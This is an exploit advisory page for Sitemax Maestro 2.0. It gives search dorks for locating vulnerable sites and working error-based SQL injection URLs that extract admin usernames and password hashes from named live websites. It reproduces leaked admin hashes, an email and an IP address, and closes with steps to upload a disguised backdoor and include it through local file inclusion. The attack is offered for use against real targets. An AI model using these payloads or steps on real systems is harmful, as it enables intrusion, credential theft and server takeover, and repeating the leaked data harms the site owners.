Bug: Sitemax Maestro 2.0 SQL Injection and LFI ( Ascii Version )

Search:
WLB2

Sitemax Maestro 2.0 SQL Injection and LFI

Published
Credit
Risk
2012.09.04
AkaStep & BOT_25 & HERO_AZE
Medium
CWE
CVE
Local
Remote
CWE-89
CWE-98
N/A ( Add )
No
Yes
 Dork: site:am pages.php?al= OR site:am swlang.php

========================================
Vulnerable Software: Sitemax Maestro v. 2.0 (from http://sitemax.am/)
Sitemax Maestro v. 2.0
Vendor: http://sitemax.am/
License Type: Commercial
Discovered and Exploited in Wild
=========================================
Dork 1:
site:am pages.php?al=

Dork 2:
site:am swlang.php

Dork: 3

Designed and developed by SiteMax IT
Sitemax Maestro v. 2.0

=========================================


Error based Blind SQLi:


http://megasport.am/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select
count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from
information_schema.tables group by x)a)-- AND 1='1

http://megasport.am/maestro/ <== Admin Panel


Megasport
2012-09-03 05:51
Fatal error : SQL error : Duplicate entry 'admin|1a90712bbe24c5142e13fe9d7a98e6031' for key 1
SELECT * FROM sed_zpages WHERE alias='100000000000000000000000000' or (select floor(rand(0)*2) from(select
count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from
information_schema.tables group by x)a)-- AND 1='1' and _level_ >= 1




If the MYSQL v >5.1 you can use this way also:(Funny pow() failure ;))

http://sXXe.tld/pages.php?al=100000000000000000000000000' or (select pow((select hex((select
concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1


Demo 2 and New technique:


http://armeXXXrok.am/pages.php?al=contacts1' or (select pow((select hex((select
concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1


2012-09-02 19:59
Fatal error : SQL error : DOUBLE value is out of range in 'pow((hex((select
concat_ws('admin','e6053eb8d35e02ae40beeeacef203c1a','getosdur@localhost.tld','130.193.121.51') from dual limit
1))),(rand() * 1e100))'
SELECT * FROM sed_zpages WHERE alias='contacts1' or (select pow((select hex((select
concat_ws(user_name,user_password,user_email,user_lastip) from sed_users limit 1))),rand()*1e100))-- AND 1='1' AND
visible='1' LIMIT 1



Local File Inclusion:

After gain access to admin panel: Upload your backdoor as backdoor.gif file using site.am/pfs.php

Then include it: site.am/swlang.php?lang=../../datas/users/3-fuck.gif%00&redirect=L2FkbWluLnBocA==

Enjoy with your backdoor on server)


SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================

/AkaStep & BOT_25 & HERO_AZE

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version